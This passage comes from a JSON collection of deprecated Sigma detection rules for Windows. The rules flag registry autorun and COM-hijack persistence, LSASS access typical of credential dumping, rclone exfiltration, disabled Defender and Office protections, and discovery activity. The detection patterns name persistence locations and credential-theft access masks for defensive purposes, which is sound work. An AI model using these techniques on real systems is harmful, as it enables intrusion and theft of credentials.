TargetObject|contains: '\\System\\CurrentControlSet\\Control\\Session Manager'\n    session_manager:\n        TargetObject|contains:\n            - '\\SetupExecute'\n            - '\\S0InitialCommand'\n            - '\\KnownDlls'\n            - '\\Execute'\n            - '\\BootExecute'\n            - '\\AppCertDlls'\n    current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion'\n    current_version:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run'\n            - '\\Policies\\System\\Shell'\n            - '\\Policies\\Explorer\\Run'\n            - '\\Group Policy\\Scripts\\Startup'\n            - '\\Group Policy\\Scripts\\Shutdown'\n            - '\\Group Policy\\Scripts\\Logon'\n            - '\\Group Policy\\Scripts\\Logoff'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n            - '\\Authentication\\PLAP Providers'\n            - '\\Authentication\\Credential Providers'\n            - '\\Authentication\\Credential Provider Filters'\n    nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n    nt_current_version:\n        TargetObject|contains:\n            - '\\Winlogon\\VmApplet'\n            - '\\Winlogon\\Userinit'\n            - '\\Winlogon\\Taskman'\n            - '\\Winlogon\\Shell'\n            - '\\Winlogon\\GpExtensions'\n            - '\\Winlogon\\AppSetup'\n            - '\\Winlogon\\AlternateShells\\AvailableShells'\n            - '\\Windows\\IconServiceLib'\n            - '\\Windows\\Appinit_Dlls'\n            - '\\Image File Execution Options'\n            - '\\Font Drivers'\n            - '\\Drivers32'\n            - '\\Windows\\Run'\n            - '\\Windows\\Load'\n    wow_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion'\n    wow_current_version:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n    wow_nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion'\n    wow_nt_current_version:\n        TargetObject|contains:\n            - '\\Windows\\Appinit_Dlls'\n            - '\\Image File Execution Options'\n            - '\\Drivers32'\n    wow_office:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Microsoft\\Office'\n    office:\n        TargetObject|contains: '\\Software\\Microsoft\\Office'\n    wow_office_details:\n        TargetObject|contains:\n            - '\\Word\\Addins'\n            - '\\PowerPoint\\Addins'\n            - '\\Outlook\\Addins'\n            - '\\Onenote\\Addins'\n            - '\\Excel\\Addins'\n            - '\\Access\\Addins'\n            - 'test\\Special\\Perf'\n    wow_ie:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Microsoft\\Internet Explorer'\n    ie:\n        TargetObject|contains: '\\Software\\Microsoft\\Internet Explorer'\n    wow_ie_details:\n        TargetObject|contains:\n            - '\\Toolbar'\n            - '\\Extensions'\n            - '\\Explorer Bars'\n    wow_classes_base:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Classes'\n    wow_classes:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - '\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\ShellEx\\ColumnHandlers'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    classes_base:\n        TargetObject|contains: '\\Software\\Classes'\n    classes:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - '\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\Shellex\\ColumnHandlers'\n            - '\\Filter'\n            - '\\Exefile\\Shell\\Open\\Command\\(Default)'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\.exe'\n            - '\\.cmd'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    scripts_base:\n        TargetObject|contains: '\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts'\n    scripts:\n        TargetObject|contains:\n            - '\\Startup'\n            - '\\Shutdown'\n            - '\\Logon'\n            - '\\Logoff'\n    winsock_parameters_base:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters'\n    winsock_parameters:\n        TargetObject|contains:\n            - '\\Protocol_Catalog9\\Catalog_Entries'\n            - '\\NameSpace_Catalog5\\Catalog_Entries'\n    system_control_base:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control'\n    system_control:\n        TargetObject|contains:\n            - '\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram'\n            - '\\Terminal Server\\Wds\\rdpwd\\StartupPrograms'\n            - '\\SecurityProviders\\SecurityProviders'\n            - '\\SafeBoot\\AlternateShell'\n            - '\\Print\\Providers'\n            - '\\Print\\Monitors'\n            - '\\NetworkProvider\\Order'\n            - '\\Lsa\\Notification Packages'\n            - '\\Lsa\\Authentication Packages'\n            - '\\BootVerificationProgram\\ImagePath'\n    filter:\n        - Details: '(Empty)'\n        - TargetObject|endswith: '\\NgcFirst\\ConsecutiveSwitchCount'\n        - Image: 'C:\\WINDOWS\\System32\\svchost.exe'\n    condition: ( main_selection or\n               session_manager_base and session_manager or\n               current_version_base and current_version or\n               nt_current_version_base and nt_current_version or\n               wow_current_version_base and wow_current_version or\n               wow_nt_current_version_base and wow_nt_current_version or\n               (wow_office or office) and wow_office_details or\n               (wow_ie or ie) and wow_ie_details or\n               wow_classes_base and wow_classes or\n               classes_base and classes or\n               scripts_base and scripts or\n               winsock_parameters_base and winsock_parameters or\n               system_control_base and system_control ) and not filter\nfields:\n    - SecurityID\n    - ObjectName\n    - OldValueType\n    - NewValueType\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\ntags:\n    - attack.persistence\n    - attack.t1547.001"
  },
  {
    "path": "deprecated/windows/registry_set_abusing_windows_telemetry_for_persistence.yml",
    "content": "title: Abusing Windows Telemetry For Persistence - Registry\nid: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5\nstatus: deprecated\ndescription: |\n  Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\n  This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\n  The problem is, it will run any arbitrary command without restriction of location or type.\nreferences:\n    - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nauthor: Sreeman\ndate: 2020/09/29\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.persistence\n    - attack.t1112\n    - attack.t1053\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\'\n        Details|endswith:\n            - '.sh'\n            - '.exe'\n            - '.dll'\n            - '.bin'\n            - '.bat'\n            - '.cmd'\n            - '.js'\n            - '.ps'\n            - '.vb'\n            - '.jar'\n            - '.hta'\n            - '.msi'\n            - '.vbs'\n    condition: selection\nfields:\n    - EventID\n    - CommandLine\n    - TargetObject\n    - Details\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_add_hidden_user.yml",
    "content": "title: User Account Hidden By Registry\nid: 8a58209c-7ae6-4027-afb0-307a78e4589a\nstatus: deprecated\ndescription: Detect modification for a specific user to prevent that user from being listed on the logon screen\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md\nauthor: frack113\ndate: 2022/08/20\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1564.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\\'\n        TargetObject|endswith: '$'\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_creation_service_uncommon_folder.yml",
    "content": "title: Service Binary in Uncommon Folder\nid: c625c4c2-515d-407f-8bb6-456f65955669\nstatus: deprecated\ndescription: Detect the creation of a service with a service binary located in a uncommon directory\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/05/02\nmodified: 2024/03/25\ntags:\n    - attack.defense_evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_1:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\Start'\n        Image|contains:\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n        Details:\n            - 'DWORD (0x00000000)'  # boot\n            - 'DWORD (0x00000001)'  # System\n            - 'DWORD (0x00000002)'  # Automatic\n            # 3 - Manual , 4 - Disabled\n    selection_2:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n    filter:\n        - Image|contains:\n              - '\\AppData\\Roaming\\Zoom'\n              - '\\AppData\\Local\\Zoom'\n        - Details|contains:\n              - '\\AppData\\Roaming\\Zoom'\n              - '\\AppData\\Local\\Zoom'\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/registry_set_disable_microsoft_office_security_features.yml",
    "content": "title: Disable Microsoft Office Security Features\nid: 7c637634-c95d-4bbf-b26c-a82510874b34\nstatus: deprecated\ndescription: Disable Microsoft Office Security Features by registry\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n    - https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/\nauthor: frack113\ndate: 2021/06/08\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\n    definition: key must be add to the sysmon configuration to works\n    # Sysmon\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\VBAWarnings</TargetObject>\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\DisableInternetFilesInPV</TargetObject>\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\DisableUnsafeLocationsInPV</TargetObject>\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\DisableAttachementsInPV</TargetObject>\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Office\\'\n        TargetObject|endswith:\n            - VBAWarnings\n            - DisableInternetFilesInPV\n            - DisableUnsafeLocationsInPV\n            - DisableAttachementsInPV\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_malware_adwind.yml",
    "content": "title: Adwind RAT / JRAT - Registry\nid: 42f0e038-767e-4b85-9d96-2c6335bad0b5\nrelated:\n    - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71\n      type: derived\nstatus: deprecated\ndescription: Detects javaw.exe in AppData folder as used by Adwind / JRAT\nreferences:\n    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\n    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community\ndate: 2017/11/10\nmodified: 2024/03/26\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'\n        Details|startswith: '%AppData%\\Roaming\\Oracle\\bin\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_office_security.yml",
    "content": "title: Office Security Settings Changed\nid: 9b894e57-033f-46cf-b7fa-a52804181973\nstatus: deprecated\ndescription: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\n    - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nauthor: Trent Liffick (@tliffick)\ndate: 2020/05/22\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Security\\Trusted Documents\\TrustRecords'\n            - '\\Security\\AccessVBOM'\n            - '\\Security\\VBAWarnings'\n    condition: selection\nfalsepositives:\n    - Valid Macros and/or internal documents\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_persistence_com_hijacking_susp_locations.yml",
    "content": "title: Potential Persistence Via COM Hijacking From Suspicious Locations\nid: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77\nrelated:\n    - id: 790317c0-0a36-4a6a-a105-6e576bf99a14\n      type: derived\nstatus: deprecated\ndescription: Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a suspicious or unusual location.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/07/28\nmodified: 2024/07/16\ntags:\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\CLSID\\'\n        TargetObject|endswith:\n            - '\\InprocServer32\\(Default)'\n            - '\\LocalServer32\\(Default)'\n        Details|contains: # Add more suspicious paths and locations\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - '\\System32\\spool\\drivers\\color\\' # as seen in the knotweed blog\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '%appdata%'\n            - '%temp%'\n            - '%tmp%'\n    condition: selection\nfalsepositives:\n    - Probable legitimate applications. If you find these please add them to an exclusion list\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_persistence_search_order.yml",
    "content": "title: Potential Persistence Via COM Search Order Hijacking\nid: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12\nrelated:\n    - id: 790317c0-0a36-4a6a-a105-6e576bf99a14\n      type: derived\nstatus: deprecated\ndescription: Detects potential COM object hijacking leveraging the COM Search Order\nreferences:\n    - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/\nauthor: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien\ndate: 2020-04-14\nmodified: 2024-09-02\ntags:\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection: # Detect new COM servers in the user hive\n        TargetObject|contains: '\\CLSID\\'\n        TargetObject|endswith: '\\InprocServer32\\(Default)'\n    filter_main_generic:\n        Details|contains: # Exclude privileged directories and observed FPs\n            - '%%systemroot%%\\system32\\'\n            - '%%systemroot%%\\SysWow64\\'\n    filter_main_onedrive:\n        Details|contains:\n            # Related To OneDrive\n            - '\\AppData\\Local\\Microsoft\\OneDrive\\'\n            - '\\FileCoAuthLib64.dll'\n            - '\\FileSyncShell64.dll'\n            - '\\FileSyncApi64.dll'\n    filter_main_health_service:\n        Image|endswith: ':\\WINDOWS\\system32\\SecurityHealthService.exe'\n    filter_main_teams:\n        Details|contains|all:\n            - '\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\'\n            - '\\Microsoft.Teams.AddinLoader.dll'\n    filter_main_dropbox:\n        Details|contains|all:\n            - '\\AppData\\Roaming\\Dropbox\\'\n            - '\\DropboxExt64.*.dll'\n    filter_main_trend_micro:\n        Details|endswith: 'TmopIEPlg.dll' # TrendMicro osce\n    filter_main_update:\n        Image|endswith:\n            - ':\\WINDOWS\\system32\\wuauclt.exe'\n            - ':\\WINDOWS\\system32\\svchost.exe'\n    filter_main_defender:\n        Image|contains:\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - ':\\Program Files\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_main_nvidia:\n        Details|contains: '\\FileRepository\\nvmdi.inf'\n    filter_main_edge:\n        Image|endswith: '\\MicrosoftEdgeUpdateComRegisterShell64.exe'\n    filter_main_dx:\n        Image|endswith: ':\\WINDOWS\\SYSTEM32\\dxdiag.exe'\n    filter_main_python:\n        Details|endswith:\n            - ':\\Windows\\pyshellext.amd64.dll'\n            - ':\\Windows\\pyshellext.dll'\n    filter_main_bonjourlib:\n        Details|endswith:\n            - ':\\Windows\\system32\\dnssdX.dll'\n            - ':\\Windows\\SysWOW64\\dnssdX.dll'\n    filter_main_printextensionmanager:\n        Details|endswith: ':\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll'\n    filter_main_programfiles:\n        Details|contains:\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n    filter_main_programdata:\n        Details|contains: ':\\ProgramData\\Microsoft\\'\n    filter_main_gameservice:\n        Details|contains: ':\\WINDOWS\\system32\\GamingServicesProxy.dll'\n    filter_main_poqexec:\n        Image|endswith: ':\\Windows\\System32\\poqexec.exe'\n        Details|contains: ':\\Windows\\System32\\Autopilot.dll'\n    filter_main_sec_health_svc:\n        Image|endswith: ':\\Windows\\system32\\SecurityHealthService.exe'\n        Details|contains: ':\\Windows\\System32\\SecurityHealth'\n    filter_main_inprocserver:\n        Image|endswith:\n            - ':\\Windows\\System32\\poqexec.exe'\n            - ':\\Windows\\System32\\regsvr32.exe'\n        TargetObject|endswith: '\\InProcServer32\\(Default)'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/registry_set_silentprocessexit.yml",
    "content": "title: SilentProcessExit Monitor Registration\nid: c81fe886-cac0-4913-a511-2822d72ff505\nstatus: deprecated\ndescription: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process\nreferences:\n    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\n    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/02/26\nmodified: 2023/08/17\ntags:\n    - attack.persistence\n    - attack.t1546.012\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit'\n        Details|contains: 'MonitorProcess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml",
    "content": "title: Accessing WinAPI in PowerShell for Credentials Dumping\nid: 3f07b9d1-2082-4c56-9277-613a621983cc\nstatus: deprecated\ndescription: Detects Accessing to lsass.exe by Powershell\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/06\nmodified: 2022/12/18\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID:\n            - 8\n            - 10\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/sysmon_dcom_iertutil_dll_hijack.yml",
    "content": "title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon\nid: e554f142-5cf3-4e55-ace9-a1b59e0def65\nstatus: deprecated\ndescription: Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga\ndate: 2020/10/12\nmodified: 2022/12/18\ntags:\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection_one:\n        EventID: 11\n        Image: System\n        TargetFilename|endswith: '\\Internet Explorer\\iertutil.dll'\n    selection_two:\n        EventID: 7\n        Image|endswith: '\\Internet Explorer\\iexplore.exe'\n        ImageLoaded|endswith: '\\Internet Explorer\\iertutil.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/sysmon_mimikatz_detection_lsass.yml",
    "content": "title: Mimikatz Detection LSASS Access\nid: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9\nstatus: deprecated\ndescription: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION \"only old\n    versions\", 0x0010 PROCESS_VM_READ)\nreferences:\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\ntags:\n    - attack.t1003\n    - attack.s0002\n    - attack.credential_access\n    - car.2019-04-004\nauthor: Sherif Eldeeb\ndate: 2017/10/18\nmodified: 2022/04/11\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x1010'\n            - '0x410'\n    filter:\n        SourceImage|startswith: \n            - 'C:\\Program Files\\WindowsApps\\'\n            - 'C:\\Windows\\System32\\'\n        SourceImage|endswith: '\\GamingServices.exe'\n    condition: selection and not filter\nfields:\n    - ComputerName\n    - User\n    - SourceImage\nfalsepositives:\n    - Some security products access LSASS in this way.\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/sysmon_powershell_execution_moduleload.yml",
    "content": "title: PowerShell Execution\nid: 867613fb-fa60-4497-a017-a82df74a172c\ndescription: Detects execution of PowerShell\nstatus: deprecated\ndate: 2019/09/12\nmodified: 2021/11/05\nauthor: Roberto Rodriguez @Cyb3rWard0g\nreferences:\n    - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html\ntags:\n    - attack.execution\n    - attack.t1086          # an old one\n    - attack.t1059.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection: \n        Description: 'System.Management.Automation'\n        ImageLoaded|contains: 'System.Management.Automation'\n    condition: selection\nfields:\n    - ComputerName\n    - Image\n    - ProcessID\n    - ImageLoaded\nfalsepositives:\n    - Unknown\nlevel: medium"
  },
  {
    "path": "deprecated/windows/sysmon_rclone_execution.yml",
    "content": "title: RClone Execution\nid: a0d63692-a531-4912-ad39-4393325b2a9c\nstatus: deprecated\ndescription: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nauthor: Bhabesh Raj, Sittikorn S\ndate: 2021/05/10\nmodified: 2022/04/11\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a\n    - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone\n    - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html\nfields:\n    - CommandLine\n    - ParentCommandLine\n    - Details\nfalsepositives:\n    - Legitimate RClone use\nlevel: high\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description: 'Rsync for cloud storage'\n    selection2:\n        CommandLine|contains|all:\n            - '--config '\n            - '--no-check-certificate '\n            - ' copy '\n    selection3:\n        Image|endswith:\n            - '\\rclone.exe'\n        CommandLine|contains:\n            - 'mega'\n            - 'pcloud'\n            - 'ftp'\n            - '--progress'\n            - '--ignore-existing'\n            - '--auto-confirm'\n            - '--transfers'\n            - '--multi-thread-streams'\n    condition: 1 of selection*\n"
  },
  {
    "path": "deprecated/windows/win_defender_disabled.yml",
    "content": "title: Windows Defender Threat Detection Disabled\nid: fe34868f-6e0e-4882-81f6-c43aa8f15b62\nstatus: deprecated\ndescription: Detects disabling Windows Defender threat protection\nreferences:\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Ján Trenčanský, frack113\ndate: 2020/07/28\nmodified: 2023/11/22\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID:\n            - 5001 # Real-time protection is disabled.\n            - 5010 # Scanning for malware and other potentially unwanted software is disabled.\n            - 5012 # Scanning for viruses is disabled.\n            - 5101 # The antimalware platform is expired.\n    condition: selection\nfalsepositives:\n    - Administrator actions (should be investigated)\n    - Seen being triggered occasionally during Windows 8 Defender Updates\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_dsquery_domain_trust_discovery.yml",
    "content": "title: Domain Trust Discovery\nid: 77815820-246c-47b8-9741-e0def3f57308\nstatus: deprecated\ndescription: Detects a discovery of domain trusts.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019/10/23\nmodified: 2023/02/04\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n      - Image|endswith: '\\dsquery.exe'\n        CommandLine|contains|all:\n            - '-filter'\n            - 'trustedDomain'\n      - Image|endswith: '\\nltest.exe'\n        CommandLine|contains: 'domain_trusts'\n    condition: selection\nfalsepositives:\n    - Administration of systems.\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/win_lateral_movement_condrv.yml",
    "content": "title: Lateral Movement Indicator ConDrv\nid: 29d31aee-30f4-4006-85a9-a4a02d65306c\nstatus: deprecated #Too many FP\ndescription: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.\nauthor: Janantha Marasinghe\ndate: 2021/04/27\nmodified: 2022/05/14\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm\n    - https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html\ntags:\n    - attack.lateral_movement\n    - attack.execution\n    - attack.t1021\n    - attack.t1059\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n          EventID: 4674\n          ObjectServer: 'Security'\n          ObjectType: 'File'\n          ObjectName: '\\Device\\ConDrv'\n    condition: selection\nfalsepositives:\n    - Legal admin action\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/win_security_event_log_cleared.yml",
